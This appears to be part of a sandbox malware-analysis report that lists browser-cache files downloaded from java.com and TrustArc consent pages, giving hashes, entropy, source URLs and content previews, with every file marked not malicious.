SHA1:	5D4CDC3E796E06B2542450F4D0533F02E26D9C09
SHA-256:	8CF75A638B4DB506BC4B28FB12AB33432AC5DA8DD775EC721B4627F8D50246A4
SHA-512:	547331AC9047504133D53AED25675BAC90A3FB0FD166E536C23BD0EBD07DDEA75B586428A8E6C4F280A97C66293DE3286A12A8C3FE8AA669C7A8C01202C034ED
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/screen.css
Preview:	html, body, div, span, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, code, del, dfn, em, img, q, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {. margin: 0;. padding: 0;. border: 0;. font-weight: inherit;. font-style: inherit;. font-size: 100%;. font-family: inherit;. vertical-align: baseline.}..body {. line-height: 1.5.}..table {. border-collapse: separate;. border-spacing: 0.}..caption, th, td {. text-align: left;. font-weight: normal.}..table, td, th {. vertical-align: middle.}..blockquote:before, blockquote:after, q:before, q:after {. content: "".}..blockquote, q {. quotes: """".}..a img {. border: 0.}..body {. font-size: 75%;. color: #222;. background: #fff;. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif.}..h1, h2, h3, h4, h5, h6 {. font-weight: normal;. color: #111.}..h1 {. font-size: 3em;. line-height: 1;. margin-bottom: .5em.}..h2 {. font-si

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\theme.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	86057
Entropy (8bit):	5.293478370265226
Encrypted:	false
SSDEEP:	1536:X+SiP1GohxDDogabxkHB4SpcEkMj/t7KZ/52uFGEeJul1BgJ2tM5Po+bQuo4kQ4H:iNV7KZMoWISJQMdkuo4kQ47GK/
MD5:	EB519B683BF8B78B57BBCCB92F2B6FFA
SHA1:	02906CED3B1DE28743DCB6CB7BF09F9E89E1FDAC
SHA-256:	7ED7C6A415CE8873EE944D54FBD3B886CC9BB0D62B5B6A84E05EBE963C4005AD
SHA-512:	29594674F002C9080CD277950EC1C8DB87DA77949C1885AA8A56BF2742FADCB5DD9B240BC3C5DB0F9AF95EDA84CD1044F8CF497B96FE8BD4F75556A263FFECB1
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/theme.min.js
Preview:	!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,h=n.hasOwnProperty,a=h.toString,l=a.call(Object),v={};function m(e,t){var n=(t=t\|\|E).createElement("script");n.text=e,t.head.appendChild(n).parentNode.removeChild(n)}function c(e,t){return t.toUpperCase()}var f="3.2.1",k=function(e,t){return new k.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,d=/^-ms-/,y=/-([a-z])/g;function x(e){var t=!!e&&"length"in e&&e.length,n=k.type(e);return"function"!==n&&!k.isWindow(e)&&("array"===n\|\|0===t\|\|"number"==typeof t&&0<t&&t-1 in e)}k.fn=k.prototype={jquery:f,constructor:k,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.c

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\v1[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	71813
Entropy (8bit):	5.312055266421633
Encrypted:	false
SSDEEP:	1536:tmTkVZQm0BKGEJcnJGqo01KvJ/xKIqarUKYkI8obCJwl8KBwrAcE4/I36sn:gi10BKGiL0svJ/xKLarrYkI8HJwywvn
MD5:	74A54934262638C24F2C3C7FC0078746
SHA1:	A60AD452C59E734B476B7CA03D95B2D68BE92314
SHA-256:	8952CCC09C989C9864DC4D80FC2FF261A1AEC5CE7E02AD9BFE4D0C71B51928A0
SHA-512:	C2D17807CF0F0098AFC21B05BC4E391239C976BD450130D36E14B90C35EAFF8C40D92429F65F37130ABA78C6942F97456CD623DE2571D59F7A020C47BBB8AD7E
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/asset/notice.js/v/v1.7-1745
Preview:	function _truste_eu(){function u(){var h=truste.eu.bindMap;h.feat.isConsentRetrieved=h.feat.crossDomain?h.feat.isConsentRetrieved:!0;if(!u.done&&h.feat.isConsentRetrieved){u.done=!0;truste.eu.ccpa.initialize();truste.eu.dnt();var l=function(){var a=truste.eu.bindMap;if(a.feat.consentResolution){var b=truste.util.readCookie(truste.eu.COOKIE_GDPR_PREF_NAME,!0);if(b&&(b=b.split(":"),!RegExp(a.behavior+"."+a.behaviorManager).test(b[2])&&(/(,us\|none)/i.test(b[2])\|\|"eu"==a.behaviorManager&&/implied.eu/i.test(b[2]))))return!0}return!1};.truste.util.fireCustomEvent(h.prefCookie);var a=function(){var a=(new Date).getTime(),b=truste.util.readCookie(truste.eu.COOKIE_REPOP,!0),c=truste.eu.bindMap.popTime;return c&&c!=b&&a>=c}();a&&(h.feat.dropPopCookie=!0);h.feat.isDNTOptoutEvent?h.feat.dntShowUI&&"expressed"==h.behavior&&(truste.eu.clickListener(truste.eu.noticeLP.pn,!0),truste.eu.msg.log("consent",h,h.messageBaseUrl)):null!=truste.util.getIntValue(h.prefCookie)?("expressed"==h.behavior&&(a\|\|l())

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\1.cache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	19432
Entropy (8bit):	5.580344910706707
Encrypted:	false
SSDEEP:	384:EK6hVeThiUgz4Y5Xhsxt8gCxGe6VtWNBK6Z+JA3jviFlJecNKp139J/ozNJMU:EA97gUz8lxktuKA3DizTyo
MD5:	55C52117BF9BC174A987D07FCD7297D5
SHA1:	743E92AD8B74903117073C161A376FEEC4BFE6A2
SHA-256:	3AC30D3684EF5FAC4D54977D24566AEB45B56D17640DD29BC778A44118B7A822
SHA-512:	2CB23BC98BBD9C7C9DC73791903E44E87DE5C6C30A4A9FE55B40278E016505AA7CD2A337A89F570B272683BAADE1AA492C687707C9B5BE74454F87FC1126CF54
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/0D070042D9C67A68E1A4BF804E6E0E06/1.cache.js
Preview:	function lp(){}.function asb(){}.function dsb(){}.function gsb(){}.function psb(){}.function aub(){ec()}.function eub(a){this.b=a}.function iub(a){this.b=a}.function Lnb(a){this.b=a}.function Onb(a){this.b=a}.function Snb(a){this.b=a}.function jsb(a){this.b=a}.function vsb(a){this.b=a}.function Ltb(a){this.b=a}.function Otb(a){this.b=a}.function Ttb(a){this.b=a}.function Ytb(a){this.b=a}.function msb(a){ec();this.b=a}.function lub(a){ec();this.b=a}.function _ab(a,b){Dl(a.Qd,b)}.function v7(a,b){Nk(a.Qd,b)}.function x7(a,b){Ok(a.Qd,b)}.function Xtb(a,b){a.b.P=b;Wrb(a.b.s,b)}.function uMb(){uMb=Q5b;YPb(NK.e)}.function Dl(b,a){b.selectedIndex=a}.function ftb(a,b){a.o=b;Ri(4,new Etb(a,b))}.function Zrb(){d8(this,ssb(new tsb(this)))}.function kp(){kp=Q5b;jp=new Ep(xec,new lp)}.function Zab(a,b){Yab(a,b);return a.Qd.options[b].value}.function jtb(a){Rsb();return a!=null&&a.length>0&&!yWb(a,P7b)}.function Yab(a,b){if(b<0\|\|b>=a.Qd.options.length){throw new UTb}}.function atb(a,b){a.O=b;sPb=b;a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\GoJava[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	5138
Entropy (8bit):	7.907565594845598
Encrypted:	false
SSDEEP:	96:T2A9GXRAkg1UYIpLaZwJALfmJSB2vulzEviYHO6tuo8U5GmON0/52twL9:aA9Gtg1UYuLaZWnACgzBaRGmaE52e
MD5:	EB9F0779D76A650F83ACA4488C7B303A
SHA1:	83165410DE505BA628634CC0CCC7CE737248CAA8
SHA-256:	C004C648BEDEF20A52400C2A0CDBC5301ED8FB982D2731798C3620734F145C61
SHA-512:	81ABDF6802666D5AED53F5E5F7780877A276585536FC41A878FCBC5E5ABA96DB29A494DF536A7F6F40CFE97C39550D997C8F5A87245BEC3B74DCF8EBB46D5340
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONT2A739CE297364EFC962C8074B610F485/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................K..........................!.1...Aaq..."4QRSUt....u....26B...#$b...'3Ccr..................................9.........................!14q......AQRa."...$3..#25B...............?....:...2R...d.3.BaJ.K.AE.Q..$Z.o..........L...K.C4My&...X....i..........b.SP>....^1O.....m..,.g.E..E_..C...b.SP>....^1O.....m.r..xtG.K~..9x.>..\|.=...b.SP>..........~...Tr.}M@.&{h9x.>..\|.=..........-..........L..r.}M@.&{h;..3.?.U.[.=Q..).5...........L..w,.g.D~(....z.3b.E...U.S....7...r..n0:U.:.{qc...K...>Q.U.6...Na.kp...R.g...6..'.O..G.#."-.M......mD.-V.... B ...."......+_....3.zO....OZ~.AzF...=......W....H.......:.Y..'..d...~....V.J.):sN.,.S.$..*%?..&.1_...E0...q.2..+.Z...L^-..nH....0_.,.j..O<..2.U..Nc.F.B.YB.R...t...g..c..C9.#....A.......u..`.L:.E.`.L.Sw......#.fb.I..:.#..O../H.?....P.J

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\JavaOne(2)(2)[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
Category:	downloaded
Size (bytes):	4960
Entropy (8bit):	7.909328562752296
Encrypted:	false
SSDEEP:	96:HQsYCRWH4SNU2NA03ysP2sGzaXFo9ThquCgNeEKC3OenqzTUDD:HQsaH4SR22nP2sGzaX+Thq/gTKI5qID
MD5:	B85FC09ACE4EA90361D6D0953777F962
SHA1:	92313189D76D3F36D3727C81FD22268C14136307
SHA-256:	6A258C518CC6607283FE30819E15F51680BB08ECE976FEC96D3646B29AA964F7
SHA-512:	5B761FF706A496BBFA4D5F2AB3FD8FF8EA8977DA8188D001A61FC0B2EDF66B2BB82A61A2068AED0A0881FBE702A0EF89C6E80F114E8F0DEC04052A58504AAB52
Malicious:	false
IE Cache URL:	https://www.java.com/content/published/api/v1.1/assets/CONTA16A22C5FE954903AC54EDE7D0200709/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
Preview:	......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!........................................N............................!1.A."3QRaq.%2b......#$BDt....5CSr.......Td....................................3........................!13...AQRaq...."2...#b...............?..6...i...K..mr..he.P...?...Iq].....?..~....C..AK5.g..rSp..06.p.j...o...Y.7O.#}..?....O..'.=O..$......Y..$..5w.j7......e~<...P...q.>.s;.s.r?.i..z5r..E....^f..u..f.s..)?;{.}...OH.Uz.61."....?.=.>.q..V....U=z.~.....:}.vcmK..OL..k..&Do.........y...J.........x.MS.+......^.x..U.j.n3{:...!VL....Wq..."....7..#..X......>u..vGoE.Gnw$oO}.....uM+.#.F..Gs..S...M7'....v....{.to...-V5...:O..o...)]'-.(,)Aa_P.';.)......%tL[..v6.T..d..4N.AQ ....Z......Ty&.%...\|w.....G~.:..mGQ4.......@.O..}I5...mq`.. .[. ..<......bp..\|UT......]t..........A^RoU.#.........0.."%^,.$.+....I.....(.~v...Q.._...X.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\config[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4375
Entropy (8bit):	5.033568563640982
Encrypted:	false
SSDEEP:	48:Y1+r+F8LpXYGBc7ay+WvnNtiwhbxuToLZdnU/tcst4vEv2rQEv22UUtVtYtqPqrX:/+rpiMcTBcA4vBbLaqyJfVVXTPLW+p
MD5:	817137EAB3BC7C4C94511DF4C1EAE840
SHA1:	A343F7E63520DEF35468BCB15CD7BBBB6728E191
SHA-256:	C8AAC0F54A845CE6CA7D55EFA152423451A7B88E755929C994B86E9136485958
SHA-512:	A03987481DD8D81E5A065127AF732D18D2C6D4D3FCAE6DEA0969B93D94BC227C5C918474CC11265304192E5C37F633E6B71970A920AF2F9920AE415C3C978203
Malicious:	false
Preview:	{"h.key":"T79A9-GDDN2-93ZD5-M6HUR-X83QX","h.d":"java.com","h.t":1620316690009,"h.cr":"5e1097ff0f4c9347efb4edb68d4450ebec43c1f5","session_id":"abb58813-bcce-4a9a-a99d-406ded0233f5","site_domain":"java.com","beacon_url":"//685d5b19.akstat.io/","autorun":false,"instrument_xhr":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"History":{"enabled":true,"auto":true},"Errors":{"enabled":true,"monitorTimeout":true,"monitorEvents":true,"maxErrors":10,"sendInterval":500},"Continuity":{"enabled":true},"PageParams":{"xhr":"subresource","pageGroups":[{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/$","parameter2":"Homepage","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/download\\/help\\/","parameter2":"Help Articles","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/download\\/faq\\/","parameter2":"FAQ Articles","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\defaultpreferencemanager.nocache[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	4867
Entropy (8bit):	5.424053024572997
Encrypted:	false
SSDEEP:	96:gGvaPp1xs4ZqPFxUkttqK0wUlhfBPA/eV8rpRrKpKsE5:Nk1bZCXLUK9OhfxADroI
MD5:	93D4EC6A1649B91D22C24C5C75D77924
SHA1:	30B431BAB07DF5BF78ABD9F1FD7C6CE1B8CE2493
SHA-256:	6A66602BD79BD624A3AE23C153EAFE52C677725341F38D682ED9DE7B0B702790
SHA-512:	74EA046922A679284DCF0D04DC6B23A41FA315F1290C563B3155B250BA66CB935B0C76861490C3B28E85DF9B7D73F8067D8C888EE114D205DA8C6BA5927A4ECE
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/defaultpreferencemanager/defaultpreferencemanager.nocache.js
Preview:	function defaultpreferencemanager(){var O='',wb='" for "gwt:onLoadErrorFn"',ub='" for "gwt:onPropertyErrorFn"',hb='"><\/script>',Y='#',Gb='.cache.html',$='/',kb='//',Eb='0D070042D9C67A68E1A4BF804E6E0E06',Fb=':',ob='::',Ib='<script defer="defer">defaultpreferencemanager.onInjectionDone(\'defaultpreferencemanager\')<\/script>',gb='<script id="',rb='=',Z='?',tb='Bad handler "',Hb='DOMContentLoaded',ib='SCRIPT',fb='__gwt_marker_defaultpreferencemanager',jb='base',bb='baseUrl',S='begin',R='bootstrap',ab='clear.cache.gif',qb='content',P='defaultpreferencemanager',db='defaultpreferencemanager.nocache.js',nb='defaultpreferencemanager::',X='end',T='gwt.codesvr=',U='gwt.hosted=',V='gwt.hybrid',vb='gwt:onLoadErrorFn',sb='gwt:onPropertyErrorFn',pb='gwt:property',Cb='hosted.html?defaultpreferencemanager',xb='iframe',_='img',yb="javascript:''",Bb='loadExternalRefs',lb='meta',Ab='moduleRequested',W='moduleStartup',mb='name',zb='position:absolute;width:0;height:0;border:none',cb='script',Db='selecting

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:	downloaded
Size (bytes):	1150
Entropy (8bit):	5.4824647268315285
Encrypted:	false
SSDEEP:	12:NWlFMVaUsQsV444444wcAKyZmvebayz1Tqn2bz75rajZ0a7VN/GR6abfaHl/:EMwUOVToYvU9Y2n75rajj7WDg
MD5:	8E39F067CC4F41898EF342843171D58A
SHA1:	AB19E81CE8CCB35B81BF2600D85C659E78E5C880
SHA-256:	872BAD18B566B0833D6B496477DAAB46763CF8BDEC342D34AC310C3AC045CEFD
SHA-512:	47CD7F4CE8FCF0FC56B6FFE50450C8C5F71E3C379ECFCFD488D904D85ED90B4A8DAFA335D0E9CA92E85B02B7111C9D75205D12073253EED681868E2A46C64890
Malicious:	false
IE Cache URL:	https://www.java.com/favicon.ico
Preview:	............ .h.......(....... ..... .................................}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..........\|.........................................................\|...p...............u..z\..z\..z\..z\..z\..z\..z\...............p...v...........................................................v...z..................qU..eG..eH..eG..qU......iL...u...........z..................................................jM...w..........................fH..iK..sV..gJ..fH..sV..........fH...v......................................n..m............}c...w.....................................'v.......`.......................................................e.......e...e.......................................................i......o....p.................................................v....q............................................................z...+z................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\get[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 133 x 18
Category:	downloaded
Size (bytes):	812
Entropy (8bit):	7.606653542056993
Encrypted:	false
SSDEEP:	12:AxVdAl1OT6u00C6H/NkWUk3sVB3sh+3f77tfusUaGzC7lNe8yhr1blpDXO0quAJ3:6du1pud/NR13kY+3T5ikY7JO0yJZIdE
MD5:	67BDF1C74574F113BE0B2B2838723A6B
SHA1:	BBC3932F39925D38FB53DC089FB3799547AB2FD7
SHA-256:	354FD37BD8E6B64BE30B23DB285EBCF3FEEC8DBE44CE038D583259E7BE40272D
SHA-512:	05B86E79E36851EF5B8AF1823D65F9F6FCE85C170C74195E5DAF9EE9731E3705DB4C79C785D6EDF2B106E0B3A87194FEF1BD352F339C098CC5A849EA566B4506
Malicious:	false
IE Cache URL:	https://consent.trustarc.com/get?name=oralogo-black.gif
Preview:	GIF89a.......}\|z...................igf...,(XWUIGF...875......$" 21/B@>POM/-+" .......b`_...rqp;98... .....!.......,............'~D.P...,...(>l]O....Q.I.G...).+.9....AY....z...$ ....CJ.v..v...3b..Ml.._.q......#f.a.R.`.R...]..".{\|S..]."._...........]L...........Q..]....=..].....k.z.#..b..."...d...]...^C\|t..D.@...A;2.......^..l.x....D..!.....].$....I.>..@....e..A.....0.....d;2..4..A.6v..!..}....u.@B>..P.A dO..^.....H.\|..S.........AB...U....<y...%....3beS....R.fd..........A.18......R...%..Z...U-L......a......Hp..s..=....7.h.. L.......p....._\|...P.^.......}..:x&...`.NzHi@...=. ...}...F (.v.t....D....m.P.X..v...f..6...t..F.....D&..DD....f.Y..........PZx.....h.......@..(w...%....f..0.#$vQ..p.^'...Nz.X..8....9.(w....`........h.".E.Ai.4.....0.6.HP.....]\|"...ah7..6..#...;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\header[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	56
Entropy (8bit):	4.322381431056328
Encrypted:	false
SSDEEP:	3:FnW0CfpAGjgeJnTH+aHI:FnTCfJEeNTzHI
MD5:	D49AB4376BCF767AA505976C21CE99FB
SHA1:	67A54CA68A46E20B1081EAE5B36B6396DAB55D5A
SHA-256:	EA733AF2869543FF1CD17BC8F77F5CE7BFC0C76EA801EC8B0B92F727B29AC797
SHA-512:	998FE632B2B73034C622A7AEDE7735E79F3ED7F9E0B6C87046298B8FCD1D6C6F08546999A027ABA6A2E6E01D97775D8C520A67BC281EDAE956B80FEE3C200D7A
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/translations/root/header.js
Preview:	define({select_lang:"Select Language",Search:"Search"});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\layout[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	322
Entropy (8bit):	4.560479140514086
Encrypted:	false
SSDEEP:	6:DxlY1efZT0a6Oi+xDfQMQMEv1UCTDRnhW56eNzSlMv1H:LFTVrZxDBZE93hW56kz59H
MD5:	A41911032F556116B5525B553DA01655
SHA1:	FFB2132F6CF6F610E70790651DE88E63CE6FF140
SHA-256:	3E4AA2CB4D372FCBEBA22C9AA960E8779F44B6C9584A8C555409B2CA5D742897
SHA-512:	DFA850FAEE04B38F15653FF551773E727BB1933B8431EC825D90597FF12067D1C327A5EE4FC24032BE64BF012ECCB574B16CCAC24E3479A5FCDD44BC8FDFF098
Malicious:	false
IE Cache URL:	https://www.java.com/_compdelivery/_cache_2094/JCOM-SimplePage_Detail/assets/layout.html
Preview:	{{{variantScr}}}.<div class="row">. {{#fields}}. <div class="{{divClass}}">. <div class="jvc0w2" data-hydrate="{{hydrateData}}">. {{{body}}}. </div>. </div>. {{#navWidgets}}. <div id="leftNavSection" class="jvcs0 clearfix">{{{widgetContent}}}</div>. {{/navWidgets}}. {{/fields}}.</div>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\loading[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 31 x 31
Category:	downloaded
Size (bytes):	2608
Entropy (8bit):	7.212558742538955
Encrypted:	false
SSDEEP:	48:opmEwU9deVtdpwUCiesszQwUCivxn3wUCivjvwUCiPF3BZBwUyysnjUTROL:orwmcdpwfBsszQwfSx3wfSjvwf4FRnwj
MD5:	394BAFC3CC4DFB3A0EE48C1F54669539
SHA1:	5640EA4D0EBA1C390F587EC69463C9A5196B7FA2
SHA-256:	EB7CFD3D959B2E09C170F532E29F8B825F9BC770B2279FDE58E595617753E244
SHA-512:	A2B86BFEBA74FEAE3247C1C53BBC4C4D922936BC099FA8D8487B20AD0B699EC5D279A94F972BA478000CBF4053BA08FFBB2CA5BA82EE01B680F5033B148BBD69
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/images/loading.gif
Preview:	GIF89a................................................................666&&&PPP...ppp...VVV...hhhFFF......HHH222..........................................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,...........@.pH......b.$..tx@$.W@e..8>S...-k.\.'<\0.f4..`...../..yXg{.w.Q.o..X.........h...Dd....a....e.Ty..vky.BVe..vC..p..y..C.yFp..Q.pGpP.C.pHp..pIp....pJ......e......X.......e.....p...X....%.ia6....'_S$.jt...EY.<..M..z..h..*AY. ....I8..q...J6c.....N..8/...f...s......!.......,...........@.pH......P ...tx@$.W...8L......'...p.0g...B.h..ew....f.!.Q.mx[.........[... .Dbd...j..x....B..iti...BV[..tC.......f..C.....c..C...gc..D....c.......c.......[...cL...cM...cN..[O...fPba..lB.-.N.....!..t....."..`Q...$}..`.........b..J,{.q.G.....V.....x.I....:A..!.......,...........@.pH......P ...tx@$.W...8L......'...p.0g...B.h..ew....fusD.mx[.........[e.iCbd...j...X.T..jif^.V[..tC..[...f..C.fFc..Q.[Gc..D.cHc...cIc..B.cJ..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\metrics_group1[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	C source, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	33056
Entropy (8bit):	5.8215192547091705
Encrypted:	false
SSDEEP:	768:tJJCo9TM7eLE+UOS4bHv/fTzcG8+bau9zaxjPTTkDJa3I97:FCo9OeDS4bHv/fN8+PkwDJa497
MD5:	4F50071052FF768850C4E3E86ED7EDAC
SHA1:	B8A533324FA59E0D31934A548337AD09D011FBAD
SHA-256:	B0254F6D58ECC2EB396CC0722104E42AC097C5FDAF4827571035D2C29A774335
SHA-512:	DEB987E6BDCA55ADD4F55C3493658CE4C8F217B195C6524865243A6D8ACB441C0FD018E9EDDB04469C0CC95D0A03F9082DA9F3BF5162CE33D126DC53A1DA17AF
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/metrics_group1.js
Preview:	var s=s_gi(s_account,1);s.dynamicAccountSelection=sun_dynamicAccountSelection,s.dynamicAccountList=sun_dynamicAccountList,s.trackDownloadLinks=!0,s.trackExternalLinks=!0,s.trackInlineStats=!0,s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,doc,pdf,xls,bin,tar,Z,gz,txt,bz2,mp4,jar,dmg,sh,msi,jnlp",s.linkInternalFilters="javascript:,sun.com,java.com,opensolaris.org,sun-catalogue.com,java.net,netbeans.org,openmediacommons.org,sunspotworld.com,openoffice.org,opensparc.net,sunsource.net,opensolaris.com,mysql.com,mysql.de,mysql.fr,projectdarkstar.com,sunstudentcourses.com,kenai.com,virtualbox.org,odftoolkit.org,javafx.com,openoffice.bouncer.osuosl.org,opends.org,suntrainingcatalogue.com,cloudoffice.com",s.linkLeaveQueryString=!1,"undefined"==typeof ltv\|\|""==ltv?s.linkTrackVars="None":s.linkTrackVars=ltv,"undefined"==typeof lte\|\|""==lte?s.linkTrackEvents="None":s.linkTrackEvents=lte;var s_prop33="Version06032013",s_server=location.hostname,s_eVar35=location.href;s_eVar35=(s_eVar35=s_eVar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\notice[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	8929
Entropy (8bit):	5.410329350680202
Encrypted:	false
SSDEEP:	192:57TGITdVKY0GASJ7MF1fpem4T2J1tvFnj1E6mnNUy3cr:BGS97ASJ3T2JFnj6NUy3cr
MD5:	0FE49EF9F538E6269DB10F9252675236
SHA1:	477E7C7547BB1B41D8ECA0A5874E513BB1939C1A
SHA-256:	3BE11544451643FD5750391DE4723874601F17FA3D12E55EC7408AA8064495FD
SHA-512:	A8EFAE9E134D018C814A81AB92AB5210C798AB26F601812937C1BA4E24AF2F6B90E9DF1F18CA6F4487B95C6D188AFF61DC95D8434B8E0597769377EAFB5337BF
Malicious:	false
Preview:	function _truste_eumap(){truste=self.truste\|\|{};truste.eu\|\|(truste.eu={});truste.util\|\|(truste.util={});.(new Image(1,1)).src=("https://consent.trustarc.com/log".replace("http:","https:"))+"?domain=oracle.com&country=ch&state=&behavior=expressed&c="+(((1+Math.random())65536)\|0).toString(16).substring(1);.truste.util.error=function(l,h,k){k=k\|\|{};var j=h&&h.toString()\|\|"",e=k.caller\|\|"";if(h&&h.stack){j+="\n"+h.stack.match(/(@\|at)[^\n\r\t]/)[0]+"\n"+h.stack.match(/(@\|at)[^\n\r\t]*$/)[0].}truste.util.trace(l,j,k);if(truste.util.debug\|\|!h&&!l){return}var d={apigwlambdaUrl:"https://api-js-log.trustarc.com/error",enableJsLog:false};.if(d.enableJsLog){delete k.caller;delete k.mod;delete k.domain;delete k.authority;k.msg=l;var i=new (self.XMLHttpRequest\|\|self.XDomainRequest\|\|self.ActiveXObject)("MSXML2.XMLHTTP.3.0");.i.open("POST",d.apigwlambdaUrl,true);i.setRequestHeader&&i.setRequestHeader("Content-type","application/json");.i.send(truste.util.getJSON({info:truste.util.getJSON(k)\|\|"",erro

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\promise-polyfill.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	3873
Entropy (8bit):	4.934703049448279
Encrypted:	false
SSDEEP:	96:2sGCUBf6HofDX3Z3QL8t5wvDhk98ez8UX9afVBKkfSqiOH:s68l3sayVKzBNaB6q5
MD5:	7ECB657D16B1441F47B83F777AC75DCF
SHA1:	EF2F2A0DD519D2D1CE8D15B00352C26E6BB65762
SHA-256:	E17AE17F90AE983832F3709E67DE0F7902FE1014568410534615235A158D7AF0
SHA-512:	60AF9B02352E61D8CF92C6C6408208B149F9860605B1CFA75E0C76D56C1BCBD32FFAB25DF16647D8545ED517654E316ED6FC651A26BDFD1AA650C719B57F81AC
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/promise-polyfill.min.js
